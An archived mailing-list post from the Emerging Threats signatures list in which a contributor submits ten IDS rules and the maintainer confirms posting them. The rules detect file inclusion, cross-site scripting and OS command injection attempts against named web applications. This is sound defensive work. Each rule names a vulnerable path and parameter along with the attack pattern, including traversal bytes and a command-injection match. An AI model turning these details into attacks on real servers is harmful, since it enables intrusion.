[Emerging-Sigs] StillSecure: 10 New Signatures - 7th Dec 2012

Will Metcalf wmetcalf at emergingthreatspro.com
Fri Dec 7 13:55:03 HAST 2012


Thanks and welcome back!  All posted with some minor modifications to the
pcre's, removed nocase from dir traversal, added some fast_pattern's for
the appropriate platforms etc.

Regards,

Will

On Fri, Dec 7, 2012 at 1:20 AM, <signatures at stillsecure.com> wrote:

> Hi Matt,
>
> Please find 10 New Signatures below:
>
> 1. ET WEB_SPECIFIC_APPS ViArt Shop Evaluation admin_header.php Remote File
> Inclusion Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS ViArt Shop Evaluation admin_header.php Remote File
> Inclusion Attempt"; flow:established,to_server;
> content:"/admin/admin_header.php?"; nocase; http_uri;
> content:"root_folder_path="; nocase; http_uri;
> pcre:"/root\_folder\_path=\s*(ftps?|https?|php)\x3a\//Ui"; reference:url,
> packetstormsecurity.org/files/116871/ViArt-Shop-Evaluation-4.1-Remote-File-Inclusion.html;
> classtype:web-application-attack; sid:13753; rev:1;)
>
> 2. ET WEB_SPECIFIC_APPS ViArt Shop Evaluation ajax_list_tree.php Remote
> File Inclusion Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS ViArt Shop Evaluation ajax_list_tree.php Remote File
> Inclusion Attempt"; flow:established,to_server;
> content:"/includes/ajax_list_tree.php?"; nocase; http_uri;
> content:"root_folder_path="; nocase; http_uri;
> pcre:"/root\_folder\_path=\s*(ftps?|https?|php)\x3a\//Ui"; reference:url,
> packetstormsecurity.org/files/116871/ViArt-Shop-Evaluation-4.1-Remote-File-Inclusion.html;
> classtype:web-application-attack; sid:13754; rev:1;)
>
> 3. ET WEB_SPECIFIC_APPS ViArt Shop Evaluation previews_functions.php
> Remote File Inclusion Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS ViArt Shop Evaluation previews_functions.php Remote File
> Inclusion Attempt"; flow:established,to_server;
> content:"/includes/previews_functions.php?"; nocase; http_uri;
> content:"root_folder_path="; nocase; http_uri;
> pcre:"/root\_folder\_path=\s*(ftps?|https?|php)\x3a\//Ui"; reference:url,
> packetstormsecurity.org/files/116871/ViArt-Shop-Evaluation-4.1-Remote-File-Inclusion.html;
> classtype:web-application-attack; sid:13755; rev:1;)
>
> 4. ET WEB_SPECIFIC_APPS Achievo atknodetype parameter Local File Inclusion
> Vulnerability
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Achievo atknodetype parameter Local File Inclusion
> Vulnerability"; flow:established,to_server; content:"/dispatch.php?";
> nocase; http_uri; content:"atkaction=search"; nocase; http_uri;
> content:"atknodetype="; nocase; http_uri; content:"|2e 2e 2f|"; nocase;
> depth:200; reference:url,
> packetstormsecurity.org/files/117822/Achievo-1.4.5-XSS-LFI-SQL-Injection.html;
> classtype:web-application-attack; sid:13756; rev:1;)
>
> 5. ET WEB_SPECIFIC_APPS PRADO PHP Framework functional_tests.php Local
> File Inclusion Vulnerability
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS PRADO PHP Framework functional_tests.php Local File
> Inclusion Vulnerability"; flow:established,to_server; content:"GET";
> nocase; http_method; content:"/tests/test_tools/functional_tests.php?";
> nocase; http_uri; content:"sr="; nocase; http_uri; content:"|2e 2e 2f|";
> nocase; depth:200; reference:url,
> packetstormsecurity.org/files/118348/PRADO-PHP-Framework-3.2.0-File-Read.html;
> classtype:web-application-attack; sid:13757; rev:1;)
>
> 6. ET WEB_SPECIFIC_APPS PRADO PHP Framework functional.php Local File
> Inclusion Vulnerability
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS PRADO PHP Framework functional.php Local File Inclusion
> Vulnerability"; flow:established,to_server; content:"GET"; nocase;
> http_method; content:"/demos/time-tracker/tests/functional.php?"; nocase;
> http_uri; content:"sr="; nocase; http_uri; content:"|2e 2e 2f|"; nocase;
> depth:200; reference:url,
> packetstormsecurity.org/files/118348/PRADO-PHP-Framework-3.2.0-File-Read.html;
> classtype:web-application-attack; sid:13758; rev:1;)
>
> 7. ET WEB_SPECIFIC_APPS Inventory consulta_fact.php Cross Site Scripting
> Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Inventory consulta_fact.php Cross Site Scripting
> Attempt"; flow:established,to_server; content:"/consulta_fact.php?";
> nocase; http_uri; content:"fact_num="; nocase; http_uri;
> pcre:"/fact_num\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ui";
> reference:url,
> packetstormsecurity.org/files/117683/Inventory-1.0-Cross-Site-Scripting.html;
> classtype:web-application-attack; sid:13759; rev:1;)
>
> 8. ET WEB_SPECIFIC_APPS Inventory newinventario.php Cross Site Scripting
> Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Inventory newinventario.php Cross Site Scripting
> Attempt"; flow:established,to_server; content:"/newinventario.php?";
> nocase; http_uri; content:"sn="; nocase; http_uri;
> pcre:"/sn\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ui";
> reference:url,
> packetstormsecurity.org/files/117683/Inventory-1.0-Cross-Site-Scripting.html;
> classtype:web-application-attack; sid:13760; rev:1;)
>
> 9. ET WEB_SPECIFIC_APPS Inventory newtransact.php Cross Site Scripting
> Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Inventory newtransact.php Cross Site Scripting Attempt";
> flow:established,to_server; content:"/newtransact.php?"; nocase; http_uri;
> content:"ref="; nocase; http_uri;
> pcre:"/ref\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ui";
> reference:url,
> packetstormsecurity.org/files/117683/Inventory-1.0-Cross-Site-Scripting.html;
> classtype:web-application-attack; sid:13761; rev:1;)
>
> 10. ET WEB_SPECIFIC_APPS Nagios XI Network Monitor host parameter OS
> command injection attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Nagios XI Network Monitor host parameter OS command
> injection attempt"; flow:established,to_server;
> content:"/includes/components/graphexplorer/visApi.php?"; nocase; http_uri;
> content:"type="; nocase; http_uri; content:"host="; nocase; http_uri;
> pcre:"/host\x3d.+cat.+\/.+/Ui"; reference:url,
> packetstormsecurity.org/files/118497/Nagios-XI-Network-Monitor-2011R1.9-OS-Command-Injection.html;
> classtype:web-application-attack; sid:13762; rev:1;)
>
> Looking forward for your comments if any.
>
> Thanks & Regards,
> StillSecure
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at lists.emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreatspro.com
> The ONLY place to get complete premium rulesets for Snort 2.4.0 through
> Current!
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20121207/541cbae6/attachment.html>


More information about the Emerging-sigs mailing list